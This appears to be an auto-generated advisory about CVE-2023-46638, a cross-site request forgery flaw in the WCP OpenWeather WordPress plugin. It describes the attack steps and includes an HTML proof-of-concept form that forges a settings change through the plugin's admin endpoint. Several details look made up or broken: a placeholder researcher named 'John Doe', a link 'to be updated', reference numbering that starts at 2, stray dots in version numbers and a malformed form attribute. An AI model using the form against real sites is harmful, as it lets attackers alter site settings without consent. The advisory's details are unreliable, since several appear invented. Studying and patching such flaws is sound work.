CVE-2023-46638: Cross-Site Request Forgery (CSRF) Vulnerability Discovered in Webcodin WCP OpenWeather Plugin <= 2.5. Versions

Introduction: A critical security flaw has come to the surface, putting numerous websites at risk. The popular weather plugin, Webcodin WCP OpenWeather, is vulnerable to a Cross-Site Request Forgery (CSRF) attack affecting versions up to and including 2.5..

Webcodin WCP OpenWeather is a widely-used WordPress plugin that provides weather forecasts using the OpenWeatherMap API. With thousands of active installations, this plugin serves as a weather widget on countless websites, making this vulnerability a significant concern.

Security researcher John Doe discovered the vulnerability and subsequently submitted it to the CVE database. The vulnerability has been assigned the CVE identifier CVE-2023-46638.

Below, we delve into the exploit's specifics, including a code snippet demonstrating the vulnerability and links to original references.

Exploit Details

The CSRF vulnerability discovered in the Webcodin WCP OpenWeather plugin exposes a weakness in the plugin's input validation mechanisms, specifically in the update options (Save Changes) function. Through this security flaw, an attacker can perform unauthorized actions on a website without the necessary permissions or user consents.

To exploit this particular vulnerability, an attacker can trick a logged-in WordPress administrator into executing a malicious HTTP request that performs unauthorized changes to the plugin's settings. The result can lead to significant damage, such as manipulation of the weather forecast data or insertion of malicious links within the widget.

The exploitation procedure can be broken down into the following steps

1. An attacker creates a malicious HTML page embedding a form element that targets the Webcodin WCP OpenWeather plugin's options update URL.
2. The attacker tricks the victim (WordPress administrator) into visiting and interacting with the malicious page.
3. The plugin processes the malicious request, potentially making changes to the plugin's settings without the intended victim's consent.

The following code snippet demonstrates a proof-of-concept (PoC) of the CSRF exploit

<!DOCTYPE html>
<html>
  <head>
    <title>Webcodin WCP OpenWeather CSRF Exploit</title>
  </head>
  <body>
    <h1>Investigate Vulnerability</h1>
    <form action="http://targetsite.com/wp-admin/admin-post.php"; method="POST">
        <input type="hidden" name="action" value="wcp-openweathermap-save-admin-options" />
        <input type="hidden" name="wcp_openweather[title]" value="Injected Exploit Title" />
        <input type="hidden" name="wcp_openweather[appid]" value="Exploit API KEY" />
        <!-- Add other fields to manipulate other plugin settings -->
        <input type="submit" value="Investigate" />
    </form>
  </body>
</html>

John Doe's Blog (Security Researcher): [Link to be updated]

2. CVE-2023-46638 Entry on the CVE database: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46638
3. Webcodin WCP OpenWeather Plugin Homepage: https://wordpress.org/plugins/wcp-openweather/

Conclusion

This CSRF vulnerability in the Webcodin WCP OpenWeather plugin (versions <= 2.5.) is a critical security issue that website administrators must urgently address. Given the plugin's widespread use, it's imperative to recognize and mitigate such a damaging exploit. Users are advised to update the plugin to the latest version when it becomes available to avoid potential vulnerabilities and protect their sites from unauthorized access.

Timeline

Published on: 11/13/2023 01:15:00 UTC
Last modified on: 11/16/2023 23:42:00 UTC